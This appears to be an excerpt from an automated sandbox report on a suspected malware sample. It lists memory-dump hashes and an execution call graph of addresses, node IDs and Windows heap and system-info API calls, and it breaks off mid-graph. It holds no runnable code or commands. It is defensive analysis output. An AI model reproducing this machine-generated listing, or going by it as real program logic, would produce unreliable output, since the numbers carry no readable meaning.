                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4379d61821bd5ec56ee1a9ca0aede52a859320af4c93c0e5b64af05f426964c
                                      • Instruction ID: 89f9fcfd50f82f76b9f588b705cfb45b96cc457d0a8afc88c6c5fb97b1f4cc23
                                      • Opcode Fuzzy Hash: f4379d61821bd5ec56ee1a9ca0aede52a859320af4c93c0e5b64af05f426964c
                                      • Instruction Fuzzy Hash: 7EE128B4E001198FDB14DFA9C5849AEBBF2FF88304F2481A9D414AB355D735AD45CFA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 82bf2f6f0d9622b26d7662d7479276648ba06a324d77023c8d96782373378221
                                      • Instruction ID: e8b4904cdc6efe1343721882ad5b9abb4b4629f2d5d14c8795fabd1455587701
                                      • Opcode Fuzzy Hash: 82bf2f6f0d9622b26d7662d7479276648ba06a324d77023c8d96782373378221
                                      • Instruction Fuzzy Hash: 27E10AB4E001198FDB14DFA9C580AAEFBB2FF89304F2481A9D458AB355D735AD41CFA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 55e0e60827986f857349dbf22e4598d5286786806f938a13567ddcb2cd989b67
                                      • Instruction ID: f8608bef4b110a3411b4f983d8d2a9c3ce493e19711b2894c2dfc538963821ec
                                      • Opcode Fuzzy Hash: 55e0e60827986f857349dbf22e4598d5286786806f938a13567ddcb2cd989b67
                                      • Instruction Fuzzy Hash: B8E107B4E101198FDB14DFA9C9849AEBBF2FF89304F2481A9E414AB355D734AD41CFA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4777ee7302bbaa37faa19f8067f7a22ed86d475a8f34fc4f184f2419d6caec84
                                      • Instruction ID: cccbff33dfd02da9910cf4b0dde9775c29cabac3d6365da8cd67ea2075924352
                                      • Opcode Fuzzy Hash: 4777ee7302bbaa37faa19f8067f7a22ed86d475a8f34fc4f184f2419d6caec84
                                      • Instruction Fuzzy Hash: 78E1D6B4E10119CFDB14DFA9C5809AEBBB2FF89304F2481A9E418AB355D735A941CFA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1104825b446eb95b64bc3d895dbc44129216e0a04d775e19bc71feb8a5a3099a
                                      • Instruction ID: a2613c845e7c565d0dc4c1924af222026239b43122b572fc677443539ae4082d
                                      • Opcode Fuzzy Hash: 1104825b446eb95b64bc3d895dbc44129216e0a04d775e19bc71feb8a5a3099a
                                      • Instruction Fuzzy Hash: 55D1E675820A5ACACB00EF65D990699B771FF95300F20DB9AE40A77650EB706AC5CF81
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 663f1fd30fbb1f48c8933ffee1840aa41d9f4c0104b81487bf35e71f96bf347f
                                      • Instruction ID: 4afbbbeeea3042557bdda9e995336ce564c2e73b95d1eb3d0bfccb0b6802fbfc
                                      • Opcode Fuzzy Hash: 663f1fd30fbb1f48c8933ffee1840aa41d9f4c0104b81487bf35e71f96bf347f
                                      • Instruction Fuzzy Hash: D6D1F635820A5ACACB10EF69D990699B771FF95300F20DB9AE40A77614EF706EC5CF81
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2346644915.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1870000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6ab874f71eecaf2ec266f79044eb75ae283c41479e71337f9be95d13eb7bef2c
                                      • Instruction ID: 61766dda6601f1ad6a4bbbb8e9339fff5ec045cd541fc0d0f4910eb23ecb944a
                                      • Opcode Fuzzy Hash: 6ab874f71eecaf2ec266f79044eb75ae283c41479e71337f9be95d13eb7bef2c
                                      • Instruction Fuzzy Hash: 27A17232E1021ACFCF09DFB9C4445AEBBB2FF84300B1545AAE915EB265DB71EA45CB40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ad7cdf683758a31ed51bd8c3a47fbab3bf0d8577c8ffd984e0f099f076cec4af
                                      • Instruction ID: 851e17130c25a810c1bc4eec62c66b67f208fbf21f70d3082c58bc4536908029
                                      • Opcode Fuzzy Hash: ad7cdf683758a31ed51bd8c3a47fbab3bf0d8577c8ffd984e0f099f076cec4af
                                      • Instruction Fuzzy Hash: 3F51FEB4E102198FDB14CFA9C9845AEBBF2FF89304F24C1AAD418A7355D7355941CFA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 552e20087d635c34f3ff1e6f4188fe4ca882e95b8e420753ecfd2bb5ae45cc7b
                                      • Instruction ID: da8349f457fd9203f6287744d32a9b8c9aaac6fb84479ecbf0aa1938f0c3414b
                                      • Opcode Fuzzy Hash: 552e20087d635c34f3ff1e6f4188fe4ca882e95b8e420753ecfd2bb5ae45cc7b
                                      • Instruction Fuzzy Hash: B85108B4E102198BDB14CFA9C5845AEBBF2FF89304F24C1AAD418AB355D7349A45CFA1

                                      Execution Graph

                                      Execution Coverage:31.6%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:4.4%
                                      Total number of Nodes:1846
                                      Total number of Limit Nodes:93
                                      execution_graph 9707 40c640 9734 404bee 9707->9734 9710 404bee 6 API calls 9711 40c66b 9710->9711 9713 404bee 6 API calls 9711->9713 9719 40c708 9711->9719 9712 402bab 2 API calls 9714 40c70f 9712->9714 9715 40c683 9713->9715 9716 40c701 9715->9716 9717 404bee 6 API calls 9715->9717 9718 402bab 2 API calls 9716->9718 9722 40c694 9717->9722 9718->9719 9719->9712 9720 40c6f8 9721 402bab 2 API calls 9720->9721 9721->9716 9722->9720 9741 40c522 9722->9741 9724 40c6a9 9725 40c6ef 9724->9725 9727 405872 4 API calls 9724->9727 9726 402bab 2 API calls 9725->9726 9726->9720 9728 40c6c5 9727->9728 9729 405872 4 API calls 9728->9729 9730 40c6d5 9729->9730 9731 405872 4 API calls 9730->9731 9732 40c6e7 9731->9732 9733 402bab 2 API calls 9732->9733 9733->9725 9735 402b7c 2 API calls 9734->9735 9737 404bff 9735->9737 9736 404c3b 9736->9710 9736->9714 9737->9736 9738 4031e5 4 API calls 9737->9738 9739 404c28 9738->9739 9739->9736 9740 402bab 2 API calls 9739->9740 9740->9736 9742 402b7c 2 API calls 9741->9742 9743 40c542 9742->9743 9743->9724 9744 405941 9745 4031e5 4 API calls 9744->9745 9746 405954 9745->9746 8311 409046 8324 413b28 8311->8324 8313 40906d 8315 405b6f 6 API calls 8313->8315 8314 40904e 8314->8313 8316 403fbf 7 API calls 8314->8316 8317 40907c 8315->8317 8316->8313 8318 409092 8317->8318 8328 409408 8317->8328 8320 4090a3 8318->8320 8323 402bab 2 API calls 8318->8323 8322 402bab 2 API calls 8322->8318 8323->8320 8325 413b31 8324->8325 8326 413b38 8324->8326 8327 404056 6 API calls 8325->8327 8326->8314 8327->8326 8329 409413 8328->8329 8330 40908c 8329->8330 8342 409d36 8329->8342 8330->8322 8341 40945c 8448 40a35d 8341->8448 8343 409d43 8342->8343 8344 40a35d 4 API calls 8343->8344 8345 409d55 8344->8345 8346 4031e5 4 API calls 8345->8346 8347 409d8b 8346->8347 8348 4031e5 4 API calls 8347->8348 8349 409dd0 8348->8349 8350 405b6f 6 API calls 8349->8350 8381 409423 8349->8381 8352 409df7 8350->8352 8351 409e1c 8353 4031e5 4 API calls 8351->8353 8351->8381 8352->8351 8355 402bab 2 API calls 8352->8355 8354 409e62 8353->8354 8356 4031e5 4 API calls 8354->8356 8355->8351 8357 409e82 8356->8357 8358 4031e5 4 API calls 8357->8358 8359 409ea2 8358->8359 8360 4031e5 4 API calls 8359->8360 8361 409ec2 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409ee2 8362->8363 8364 4031e5 4 API calls 8363->8364 8365 409f02 8364->8365 8366 4031e5 4 API calls 8365->8366 8367 409f22 8366->8367 8368 4031e5 4 API calls 8367->8368 8371 409f42 8368->8371 8369 40a19b 8370 408b2c 4 API calls 8369->8370 8370->8381 8371->8369 8372 409fa3 8371->8372 8373 405b6f 6 API calls 8372->8373 8372->8381 8374 409fbd 8373->8374 8375 40a02c 8374->8375 8376 402bab 2 API calls 8374->8376 8377 4031e5 4 API calls 8375->8377 8403 40a16d 8375->8403 8379 409fd7 8376->8379 8380 40a070 8377->8380 8378 402bab 2 API calls 8378->8381 8382 405b6f 6 API calls 8379->8382 8383 4031e5 4 API calls 8380->8383 8381->8341 8404 4056bf 8381->8404 8385 409fe5 8382->8385 8384 40a090 8383->8384 8387 4031e5 4 API calls 8384->8387 8385->8375 8386 402bab 2 API calls 8385->8386 8388 409fff 8386->8388 8389 40a0b0 8387->8389 8390 405b6f 6 API calls 8388->8390 8392 4031e5 4 API calls 8389->8392 8391 40a00d 8390->8391 8391->8375 8394 40a021 8391->8394 8393 40a0d0 8392->8393 8396 4031e5 4 API calls 8393->8396 8395 402bab 2 API calls 8394->8395 8395->8381 8397 40a0f0 8396->8397 8398 4031e5 4 API calls 8397->8398 8399 40a110 8398->8399 8400 40a134 8399->8400 8401 4031e5 4 API calls 8399->8401 8400->8403 8458 408b2c 8400->8458 8401->8400 8403->8378 8403->8381 8405 402b7c 2 API calls 8404->8405 8407 4056cd 8405->8407 8406 4056d4 8409 408c4d 8406->8409 8407->8406 8408 402b7c 2 API calls 8407->8408 8408->8406 8410 413ba4 6 API calls 8409->8410 8411 408c5c 8410->8411 8412 408f02 8411->8412 8413 408f3a 8411->8413 8416 40903e 8411->8416 8415 405b6f 6 API calls 8412->8415 8414 405b6f 6 API calls 8413->8414 8430 408f51 8414->8430 8417 408f0c 8415->8417 8432 413aca 8416->8432 8417->8416 8421 408f31 8417->8421 8461 40a1b6 8417->8461 8419 405b6f 6 API calls 8419->8430 8420 402bab 2 API calls 8420->8416 8421->8420 8423 409031 8424 402bab 2 API calls 8423->8424 8424->8421 8425 409022 8426 402bab 2 API calls 8425->8426 8427 409028 8426->8427 8428 402bab 2 API calls 8427->8428 8428->8421 8429 402bab GetProcessHeap HeapFree 8429->8430 8430->8416 8430->8419 8430->8421 8430->8423 8430->8425 8430->8429 8431 40a1b6 14 API calls 8430->8431 8495 4044ee 8430->8495 8431->8430 8433 413ad7 8432->8433 8441 409451 8432->8441 8434 405781 4 API calls 8433->8434 8435 413af0 8434->8435 8436 405781 4 API calls 8435->8436 8437 413afe 8436->8437 8438 405762 4 API calls 8437->8438 8439 413b0e 8438->8439 8440 405781 4 API calls 8439->8440 8439->8441 8440->8441 8442 405695 8441->8442 8443 4056a0 8442->8443 8447 4056b9 8442->8447 8444 402bab 2 API calls 8443->8444 8445 4056b3 8444->8445 8446 402bab 2 API calls 8445->8446 8446->8447 8447->8341 8449 40a368 8448->8449 8450 40a39a 8448->8450 8455 4031e5 4 API calls 8449->8455 8451 40a3af 8450->8451 8452 4031e5 4 API calls 8450->8452 8453 40a3ca 8451->8453 8456 408b2c 4 API calls 8451->8456 8452->8451 8454 40a38a 8453->8454 8457 408b2c 4 API calls 8453->8457 8454->8330 8455->8454 8456->8453 8457->8454 8459 4031e5 4 API calls 8458->8459 8460 408b3e 8459->8460 8460->8403 8462 40a202 8461->8462 8463 40a1c3 8461->8463 8617 405f08 8462->8617 8464 405b6f 6 API calls 8463->8464 8467 40a1d0 8464->8467 8466 40a1fc 8466->8421 8467->8466 8470 40a1f3 8467->8470 8505 40a45b 8467->8505 8469 40a333 8471 402bab 2 API calls 8469->8471 8473 402bab 2 API calls 8470->8473 8471->8466 8473->8466 8474 405b6f 6 API calls 8476 40a245 8474->8476 8475 40a25d 8477 405b6f 6 API calls 8475->8477 8476->8475 8478 413a58 13 API calls 8476->8478 8483 40a26b 8477->8483 8480 40a257 8478->8480 8479 40a28b 8481 405b6f 6 API calls 8479->8481 8482 402bab 2 API calls 8480->8482 8489 40a297 8481->8489 8482->8475 8483->8479 8484 40a284 8483->8484 8624 40955b 8483->8624 8487 402bab 2 API calls 8484->8487 8485 40a2b7 8485->8469 8488 405b6f 6 API calls 8485->8488 8493 402bab 2 API calls 8485->8493 8641 4098a7 8485->8641 8487->8479 8488->8485 8489->8485 8490 40a2b0 8489->8490 8631 40968e 8489->8631 8492 402bab 2 API calls 8490->8492 8492->8485 8493->8485 8496 402b7c 2 API calls 8495->8496 8497 404512 8496->8497 8499 404585 GetLastError 8497->8499 8500 402bab 2 API calls 8497->8500 8503 40457c 8497->8503 8504 402b7c 2 API calls 8497->8504 8896 4044a7 8497->8896 8501 404592 8499->8501 8499->8503 8500->8497 8502 402bab 2 API calls 8501->8502 8502->8503 8503->8430 8504->8497 8650 40642c 8505->8650 8507 40a469 8508 40c4ff 8507->8508 8653 4047e6 8507->8653 8508->8470 8511 4040bb 12 API calls 8512 40bf88 8511->8512 8512->8508 8513 403c90 8 API calls 8512->8513 8514 40bfaa 8513->8514 8515 402b7c 2 API calls 8514->8515 8517 40bfc1 8515->8517 8516 40c4f3 8518 403f9e 5 API calls 8516->8518 8519 40c3aa 8517->8519 8660 40a423 8517->8660 8518->8508 8519->8516 8522 4056bf 2 API calls 8519->8522 8525 40c4e3 8519->8525 8520 402bab 2 API calls 8520->8516 8524 40c3d2 8522->8524 8524->8525 8527 4040bb 12 API calls 8524->8527 8525->8520 8526 405f08 4 API calls 8528 40c005 8526->8528 8529 40c3f3 8527->8529 8530 40c021 8528->8530 8663 40a43f 8528->8663 8532 40c4d1 8529->8532 8720 405a52 8529->8720 8531 4031e5 4 API calls 8530->8531 8534 40c034 8531->8534 8537 413aca 4 API calls 8532->8537 8543 4031e5 4 API calls 8534->8543 8538 40c4dd 8537->8538 8541 405695 2 API calls 8538->8541 8539 40c411 8725 405a87 8539->8725 8540 402bab 2 API calls 8540->8530 8541->8525 8549 40c04d 8543->8549 8544 40c4b3 8545 402bab 2 API calls 8544->8545 8547 40c4cb 8545->8547 8546 405a52 4 API calls 8557 40c423 8546->8557 8548 403f9e 5 API calls 8547->8548 8548->8532 8551 4031e5 4 API calls 8549->8551 8550 405a87 4 API calls 8550->8557 8552 40c085 8551->8552 8554 4031e5 4 API calls 8552->8554 8553 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8553->8557 8555 40c09c 8554->8555 8558 4031e5 4 API calls 8555->8558 8556 402bab 2 API calls 8556->8557 8557->8544 8557->8546 8557->8550 8557->8553 8557->8556 8559 40c0b3 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c0ca 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c0e7 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c100 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c119 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c132 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c14b 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c164 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c17d 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c196 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c1af 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c1c8 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c1de 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c1f4 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c20d 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c226 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c23f 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c258 8592->8593 8594 4031e5 4 API calls 8593->8594 8595 40c273 8594->8595 8596 4031e5 4 API calls 8595->8596 8597 40c28a 8596->8597 8598 4031e5 4 API calls 8597->8598 8601 40c2d5 8598->8601 8599 40c3a2 8600 402bab 2 API calls 8599->8600 8600->8519 8601->8599 8602 4031e5 4 API calls 8601->8602 8603 40c315 8602->8603 8604 40c38b 8603->8604 8666 404866 8603->8666 8605 403c40 5 API calls 8604->8605 8607 40c397 8605->8607 8609 403c40 5 API calls 8607->8609 8609->8599 8610 40c382 8612 403c40 5 API calls 8610->8612 8612->8604 8614 406c4c 6 API calls 8615 40c355 8614->8615 8615->8610 8690 4126a7 8615->8690 8618 4031e5 4 API calls 8617->8618 8619 405f1d 8618->8619 8620 405f55 8619->8620 8621 402b7c 2 API calls 8619->8621 8620->8466 8620->8469 8620->8474 8620->8475 8622 405f36 8621->8622 8622->8620 8623 4031e5 4 API calls 8622->8623 8623->8620 8625 409673 8624->8625 8630 40956d 8624->8630 8625->8484 8626 408b45 6 API calls 8626->8630 8627 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8627->8630 8628 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8628->8630 8629 402bab GetProcessHeap HeapFree 8629->8630 8630->8625 8630->8626 8630->8627 8630->8628 8630->8629 8632 4040bb 12 API calls 8631->8632 8636 4096a9 8632->8636 8633 40989f 8633->8490 8634 409896 8635 403f9e 5 API calls 8634->8635 8635->8633 8636->8633 8636->8634 8638 408b45 6 API calls 8636->8638 8639 402bab GetProcessHeap HeapFree 8636->8639 8640 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8636->8640 8889 4059d8 8636->8889 8638->8636 8639->8636 8640->8636 8642 4040bb 12 API calls 8641->8642 8648 4098c1 8642->8648 8643 4099fb 8643->8485 8644 4099f3 8645 403f9e 5 API calls 8644->8645 8645->8643 8646 4059d8 4 API calls 8646->8648 8647 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8647->8648 8648->8643 8648->8644 8648->8646 8648->8647 8649 402bab GetProcessHeap HeapFree 8648->8649 8649->8648 8651 4031e5 4 API calls 8650->8651 8652 406441 GetNativeSystemInfo 8651->8652 8652->8507 8654 4031e5 4 API calls 8653->8654 8657 40480a 8654->8657 8655 40485d 8655->8508 8655->8511 8656 4031e5 4 API calls 8656->8657 8657->8655 8657->8656 8658 40484f 8657->8658 8659 403c40 5 API calls 8658->8659 8659->8655 8661 4031e5 4 API calls 8660->8661 8662 40a435 8661->8662 8662->8526 8664 4031e5 4 API calls 8663->8664 8665 40a451 8664->8665 8665->8540 8667 4031e5 4 API calls 8666->8667 8668 40487c 8667->8668 8668->8610 8669 406c4c 8668->8669 8730 4068eb 8669->8730 8671 406e02 8671->8614 8672 406cab 8742 40469b 8672->8742 8673 406c6c 8673->8671 8673->8672 8739 406894 8673->8739 8680 406df1 8681 40469b 4 API calls 8680->8681 8681->8671 8682 406cef 8682->8680 8683 4031e5 4 API calls 8682->8683 8684 406d26 8683->8684 8684->8680 8685 40771e 6 API calls 8684->8685 8689 406d57 8685->8689 8686 406da2 8687 4031e5 4 API calls 8686->8687 8687->8680 8689->8686 8755 4068b0 8689->8755 8691 4126bb 8690->8691 8692 4126d1 8690->8692 8693 412840 8691->8693 8811 40488c 8691->8811 8692->8693 8817 407055 8692->8817 8693->8610 8697 412837 8698 403c40 5 API calls 8697->8698 8698->8693 8701 41281e 8702 4070ff 6 API calls 8701->8702 8702->8697 8703 407055 6 API calls 8704 412742 8703->8704 8704->8701 8705 40719a 6 API calls 8704->8705 8706 41276e 8705->8706 8707 412804 8706->8707 8833 406f4a 8706->8833 8861 4070ff 8707->8861 8710 41279a 8839 412553 8710->8839 8883 405907 8720->8883 8722 405a61 8723 405a76 8722->8723 8724 405907 4 API calls 8722->8724 8723->8539 8724->8722 8726 402b7c 2 API calls 8725->8726 8728 405a99 8726->8728 8729 405ade 8728->8729 8886 40595e 8728->8886 8729->8557 8758 4076a8 8730->8758 8732 406913 8733 406a61 8732->8733 8734 40771e 6 API calls 8732->8734 8733->8673 8738 406949 8734->8738 8735 40771e 6 API calls 8735->8738 8736 404678 4 API calls 8736->8738 8738->8733 8738->8735 8738->8736 8764 4046c2 8738->8764 8740 4031e5 4 API calls 8739->8740 8741 4068a6 8740->8741 8741->8673 8743 4046b4 8742->8743 8744 4046a4 8742->8744 8743->8671 8746 404678 8743->8746 8745 4031e5 4 API calls 8744->8745 8745->8743 8747 4031e5 4 API calls 8746->8747 8748 40468b 8747->8748 8748->8671 8749 40771e 8748->8749 8750 407737 8749->8750 8754 407748 8749->8754 8751 407644 6 API calls 8750->8751 8752 407741 8751->8752 8753 406baa 6 API calls 8752->8753 8753->8754 8754->8682 8756 4031e5 4 API calls 8755->8756 8757 4068c2 8756->8757 8757->8689 8759 4076c1 8758->8759 8763 4076d2 8758->8763 8772 407644 8759->8772 8763->8732 8765 4046d3 8764->8765 8766 4046d9 8764->8766 8807 40464c 8765->8807 8768 404678 4 API calls 8766->8768 8771 4046e9 8766->8771 8768->8771 8769 40469b 4 API calls 8770 404714 8769->8770 8770->8738 8771->8769 8771->8770 8773 407653 8772->8773 8775 407661 8772->8775 8773->8775 8780 406a6b 8773->8780 8776 406baa 8775->8776 8777 406bbb 8776->8777 8779 406bc8 8776->8779 8777->8779 8788 407402 8777->8788 8779->8763 8784 406a81 8780->8784 8781 402b7c 2 API calls 8781->8784 8782 406b8b 8782->8775 8783 406894 4 API calls 8783->8784 8784->8781 8784->8782 8784->8783 8785 406b96 8784->8785 8786 402bab 2 API calls 8784->8786 8787 402bab 2 API calls 8785->8787 8786->8784 8787->8782 8789 407644 6 API calls 8788->8789 8790 407412 8789->8790 8791 402b7c 2 API calls 8790->8791 8798 407450 8790->8798 8792 407483 8791->8792 8793 402b7c 2 API calls 8792->8793 8792->8798 8796 4074ce 8793->8796 8794 4074da 8795 4068cc 2 API calls 8794->8795 8795->8798 8796->8794 8797 402b7c 2 API calls 8796->8797 8801 40751f 8797->8801 8798->8779 8799 40752b 8800 4068cc 2 API calls 8799->8800 8800->8794 8801->8799 8803 4068cc 8801->8803 8804 4068d6 8803->8804 8805 4068e3 8803->8805 8804->8805 8806 402bab GetProcessHeap HeapFree 8804->8806 8805->8799 8806->8805 8808 404666 8807->8808 8809 404659 8807->8809 8808->8766 8810 4031e5 4 API calls 8809->8810 8810->8808 8812 4047e6 5 API calls 8811->8812 8813 404897 8812->8813 8814 40489c 8813->8814 8869 4047c7 8813->8869 8814->8692 8818 40706f 8817->8818 8819 407084 8817->8819 8818->8819 8820 407644 6 API calls 8818->8820 8824 4070e4 8819->8824 8872 406fd2 8819->8872 8821 40707d 8820->8821 8823 406baa 6 API calls 8821->8823 8823->8819 8824->8697 8825 40719a 8824->8825 8826 4071b0 8825->8826 8830 4071c5 8825->8830 8827 407644 6 API calls 8826->8827 8826->8830 8828 4071be 8827->8828 8829 406baa 6 API calls 8828->8829 8829->8830 8831 406fd2 4 API calls 8830->8831 8832 407226 8830->8832 8831->8832 8832->8701 8832->8703 8834 406f75 8833->8834 8835 406f64 8833->8835 8834->8710 8836 407644 6 API calls 8835->8836 8837 406f6e 8836->8837 8838 406baa 6 API calls 8837->8838 8838->8834 8880 4060ac 8839->8880 8862 407116 8861->8862 8863 40712b 8861->8863 8862->8863 8864 407644 6 API calls 8862->8864 8866 406fd2 4 API calls 8863->8866 8868 407187 8863->8868 8865 407124 8864->8865 8867 406baa 6 API calls 8865->8867 8866->8868 8867->8863 8868->8701 8870 4031e5 4 API calls 8869->8870 8871 4047d9 8870->8871 8871->8692 8873 406fde 8872->8873 8874 407027 8873->8874 8875 4031e5 4 API calls 8873->8875 8874->8824 8876 406ffa 8875->8876 8877 4031e5 4 API calls 8876->8877 8878 407011 8877->8878 8879 4031e5 4 API calls 8878->8879 8879->8874 8881 4031e5 4 API calls 8880->8881 8882 4060bb 8881->8882 8882->8882 8884 4031e5 4 API calls 8883->8884 8885 40591a 8884->8885 8885->8722 8887 4031e5 4 API calls 8886->8887 8888 405971 8887->8888 8888->8728 8890 4031e5 4 API calls 8889->8890 8891 4059ed 8890->8891 8892 405a38 8891->8892 8893 402b7c 2 API calls 8891->8893 8892->8636 8894 405a16 8893->8894 8894->8892 8895 4031e5 4 API calls 8894->8895 8895->8892 8897 4031e5 4 API calls 8896->8897 8898 4044b9 8897->8898 8898->8497 9818 40a349 9819 4098a7 13 API calls 9818->9819 9820 40a359 9819->9820 9057 408952 9078 40823f 9057->9078 9060 408960 9062 4056bf 2 API calls 9060->9062 9063 40896a 9062->9063 9106 408862 9063->9106 9065 413aca 4 API calls 9066 4089d4 9065->9066 9068 405695 2 API calls 9066->9068 9067 408975 9075 4089c4 9067->9075 9114 4087d6 9067->9114 9070 4089df 9068->9070 9075->9065 9076 402bab 2 API calls 9077 40899d 9076->9077 9077->9075 9077->9076 9079 40824d 9078->9079 9080 40831b 9079->9080 9081 4031e5 4 API calls 9079->9081 9080->9060 9094 4083bb 9080->9094 9082 40826d 9081->9082 9083 4031e5 4 API calls 9082->9083 9084 408289 9083->9084 9085 4031e5 4 API calls 9084->9085 9086 4082a5 9085->9086 9087 4031e5 4 API calls 9086->9087 9088 4082c1 9087->9088 9089 4031e5 4 API calls 9088->9089 9090 4082e2 9089->9090 9091 4031e5 4 API calls 9090->9091 9092 4082ff 9091->9092 9093 4031e5 4 API calls 9092->9093 9093->9080 9142 408363 9094->9142 9097 4056bf 2 API calls 9103 4083f4 9097->9103 9098 408492 9099 413aca 4 API calls 9098->9099 9100 4084a0 9099->9100 9101 405695 2 API calls 9100->9101 9102 4084ab 9101->9102 9102->9060 9103->9098 9145 40815d 9103->9145 9160 40805d 9103->9160 9175 404b8f 9106->9175 9108 408946 9108->9067 9109 40887e 9109->9108 9110 4031e5 4 API calls 9109->9110 9111 40893e 9109->9111 9113 402b7c 2 API calls 9109->9113 9110->9109 9178 404a39 9111->9178 9113->9109 9115 402b7c 2 API calls 9114->9115 9116 4087e7 9115->9116 9117 40885a 9116->9117 9118 4031e5 4 API calls 9116->9118 9126 408749 9117->9126 9120 408802 9118->9120 9119 408853 9121 402bab 2 API calls 9119->9121 9120->9119 9123 40884d 9120->9123 9187 408522 9120->9187 9191 4084b4 9120->9191 9121->9117 9194 4084d4 9123->9194 9127 404b8f 5 API calls 9126->9127 9129 408765 9127->9129 9128 4031e5 4 API calls 9128->9129 9129->9128 9130 408522 4 API calls 9129->9130 9131 4087c7 9129->9131 9133 4087cf 9129->9133 9130->9129 9132 404a39 5 API calls 9131->9132 9132->9133 9134 4085d1 9133->9134 9136 4086c2 9134->9136 9140 4085e9 9134->9140 9136->9077 9137 402bab 2 API calls 9137->9140 9138 4031e5 4 API calls 9138->9140 9140->9136 9140->9137 9140->9138 9200 4089e6 9140->9200 9219 4086c9 9140->9219 9223 4036a3 9140->9223 9143 4031e5 4 API calls 9142->9143 9144 408386 9143->9144 9144->9097 9144->9102 9146 40816f 9145->9146 9147 4081b6 9146->9147 9148 4081fd 9146->9148 9159 4081ef 9146->9159 9150 405872 4 API calls 9147->9150 9149 405872 4 API calls 9148->9149 9152 408213 9149->9152 9151 4081cf 9150->9151 9153 405872 4 API calls 9151->9153 9154 405872 4 API calls 9152->9154 9155 4081df 9153->9155 9156 408222 9154->9156 9157 405872 4 API calls 9155->9157 9158 405872 4 API calls 9156->9158 9157->9159 9158->9159 9159->9103 9161 40808c 9160->9161 9162 4080d2 9161->9162 9163 408119 9161->9163 9174 40810b 9161->9174 9165 405872 4 API calls 9162->9165 9164 405872 4 API calls 9163->9164 9166 40812f 9164->9166 9167 4080eb 9165->9167 9169 405872 4 API calls 9166->9169 9168 405872 4 API calls 9167->9168 9170 4080fb 